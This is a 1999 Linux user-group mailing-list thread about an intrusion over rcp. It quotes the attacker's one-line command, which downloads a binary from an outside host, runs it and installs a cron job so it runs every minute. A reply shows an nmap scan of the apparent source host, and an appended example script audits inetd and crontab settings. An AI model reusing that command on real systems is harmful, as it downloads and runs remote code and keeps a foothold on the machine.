[OLUG] RCP

Vincent Raffensberger vraffensberger at csm.edu
Tue Dec 14 18:46:37 UTC 1999


Jason Ferguson wrote:
> 
> Todd wrote:
> 
> >         Can anyone tell me how to stop RCP access to my Linux box, and if there are
> > any security tools available to monitor a RCP connection.  On December 11
> > someone gained access and performed the following to my machine:
> > rcp tcstewar at 129.97.50.62:.../lin /usr/sbin/rpc.listen ; chmod +x
> > /usr/sbin/rpc.listen; /usr/sbin/rpc.listen ; echo \* \* \* \* \*
> > /usr/sbin/rpc.listen > cron ; crontab cron ; exit ;
> >         I currently am running logwatch and uwatch, but this connection did not
> > show up in either.      Any suggestions would be welcomed.
> >
> > -------------------------------------------------------------------------
> 
> Anyone got a location to grab logwatch?  Doesn't seem to have come with RH 6.1... with
> a cable modem it's only a matter of time before someone tries this stuff with me, and I
> still don't have a decent firewall on this thing (I still don't know how the rules
> should be written, what to block, etc).
> 
> Jason
> 
> -------------------------------------------------------------------------

You can get it here:

ftp://BOFH.CSM.EDU/pub/linux/apps/rpms/

Here's some info on Todd's friend:

Starting nmap V. 2.3BETA6 by Fyodor (fyodor at dhp.com,
www.insecure.org/nmap/)
 Interesting ports on engmail.uwaterloo.ca (129.97.50.62):
Port    State       Protocol  Service
21      open        tcp       ftp                     
22      open        tcp       ssh                     
23      open        tcp       telnet                  
25      open        tcp       smtp                    
53      filtered    tcp       domain                  
79      open        tcp       finger                  
80      open        tcp       http                    
87      filtered    tcp       priv-term-l             
106     open        tcp       pop3pw                  
110     open        tcp       pop-3                   
111     filtered    tcp       sunrpc                  
143     open        tcp       imap2                   
513     open        tcp       login                   
514     open        tcp       shell                   
515     open        tcp       printer                 
540     filtered    tcp       uucp                    
2049    filtered    tcp       nfs                     

TCP Sequence Prediction: Class=random positive increments
                         Difficulty=72739 (Worthy challenge)
Remote operating system guess: FreeBSD 2.2.1 - 4.0

Nmap run completed -- 1 IP address (1 host up) scanned in 78 seconds
-- 
Vincent Raffensberger		College of Saint Mary
Network Administrator		1901 S. 72nd. St.
402-399-2433                    Omaha, NE 68124
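
Added example, not part of the original thread: rcp is served by rshd, the inetd "shell" service on 514/tcp, so the sketch below audits inetd.conf-format text for enabled r-services and crontab text for the every-minute job quoted in Todd's message. The function names and both sample inputs are constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the thread. rcp is served by rshd, which inetd
# starts as the "shell" service (514/tcp); "login" and "exec" are its siblings.

# Read inetd.conf-format text on stdin; print each r-service that is enabled
# (a leading "#" makes the first field differ from the service name).
enabled_rservices() {
    awk '$1 == "shell" || $1 == "login" || $1 == "exec" { print $1 }'
}

# Read crontab text on stdin; print the command of every "* * * * *" entry,
# the schedule used for the persistence job quoted in the thread.
every_minute_jobs() {
    awk '$1 == "*" && $2 == "*" && $3 == "*" && $4 == "*" && $5 == "*" {
        cmd = $6
        for (i = 7; i <= NF; i++) cmd = cmd " " $i
        print cmd
    }'
}

# Constructed sample inputs (assumed layouts, not taken from the affected machine).
SAMPLE_INETD='ftp     stream  tcp  nowait  root  /usr/sbin/tcpd  in.ftpd -l -a
shell   stream  tcp  nowait  root  /usr/sbin/tcpd  in.rshd
login   stream  tcp  nowait  root  /usr/sbin/tcpd  in.rlogind
#exec   stream  tcp  nowait  root  /usr/sbin/tcpd  in.rexecd'

SAMPLE_CRON='# constructed crontab
0 4 * * * /usr/sbin/logrotate /etc/logrotate.conf
* * * * * /usr/sbin/rpc.listen'

echo "enabled r-services (sample):"
printf '%s\n' "$SAMPLE_INETD" | enabled_rservices
echo "every-minute cron jobs (sample):"
printf '%s\n' "$SAMPLE_CRON" | every_minute_jobs

# On a live system (run as root to read root's crontab):
#   enabled_rservices < /etc/inetd.conf
#   crontab -l -u root | every_minute_jobs
```

Commenting out the flagged lines in /etc/inetd.conf and sending inetd a HUP stops it from accepting rsh/rcp connections.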
